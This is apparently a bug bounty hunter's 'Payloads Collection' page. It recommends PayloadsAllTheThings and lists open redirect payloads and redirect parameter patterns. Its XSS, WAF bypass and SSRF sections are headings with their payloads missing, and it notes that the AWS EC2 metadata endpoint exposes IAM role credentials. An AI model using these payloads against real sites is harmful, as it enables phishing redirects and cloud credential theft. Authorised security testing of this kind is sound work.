🎁Payloads Collection

Here I gathered some resources from around the internet for quick access to payloads whenever needed.

Github - PayloadsAllTheThings

If you have ever thought of a great swiss army knife for exploitation this GitHub will be an amazing resource for any bug bounty hunter. Not only does it host one of the most comprehensive libraries of payloads that I've personally ever seen and you're welcome to prove me wrong if there is a better one, but it also explain in depth the types of payloads, and bugs to be exploited with the hosted techniques.

Addendum 1: Also the resource is maintained by a large following of experts within the Bug Bounty community. What I encourage you to do is if you find it useful, to SHARE your appreciation for all of their work when or if you will be able to be it kind words, money or spreading the information to other people as well!

Addendum 2: Anyone can contribute to this resource, and if at any point you grow into an expert that feels like giving back to the community, you can check there that you will be able to contribute to this resource in knowledge rather than in other ways receiving and giving back the love!

Give me more payloads!

In addition to the amazing resource presented above I did find and craft from other sources as well some payloads I think deserve some attention as well.

Open Redirect Payloads

/%09/google.com /%5cgoogle.com //www.google.com/%2f%2e%2e //www.google.com/%2e%2e //google.com/ //google.com/%2f.. //\google.com /\victim.com:80%40google.com

Open Redirect Parameters

?url=http://{target} ?url=https://{target} ?next=http://{target} ?next=https://{target} ?url=//{target} ?url=$2f%2f{target} ?next=//{target} ?next=$2f%2f{target} ?url=//{target} ?url=$2f%2f{target} ?url=//{target} /redirect/{target} /cgi-bin/redirect.cgi?{target} /out/{target} /out?{target} /out?/{target} /out?//{target} /out?/{target} /out?///{target} ?view={target} ?view=/{target} ?view=//{target} ?view=/{target} ?view=///{target} /login?to={target} /login?to=/{target} /login?to=//{target} /login?to=/{target} /login?to=///{target}

XSS (Cross-Site Scripting)

Payload Resources:

Approach: If the web application allows, try all available XSS payloads to identify vulnerabilities.

WAF Bypass Payloads:

  • CloudFlare WAF:

  • Cloudfront WAF:

  • ModSecurity:

  • Imperva WAF:

SSRF (Server-Side Request Forgery)

Bypass Examples:

Note: The last one can be calculated using subnet calculators like http://www.subnetmask.info/arrow-up-right

Exotic Handlers:

IPv6 Examples:

Wildcard DNS:

Link: http://xip.ioarrow-up-right

Link: http://nip.ioarrow-up-right

AWS EC2 Metadata:

role-name is the name of the role and contains the temporary security credentials linked to the role if there is an IAM role associated with the instance.

Last updated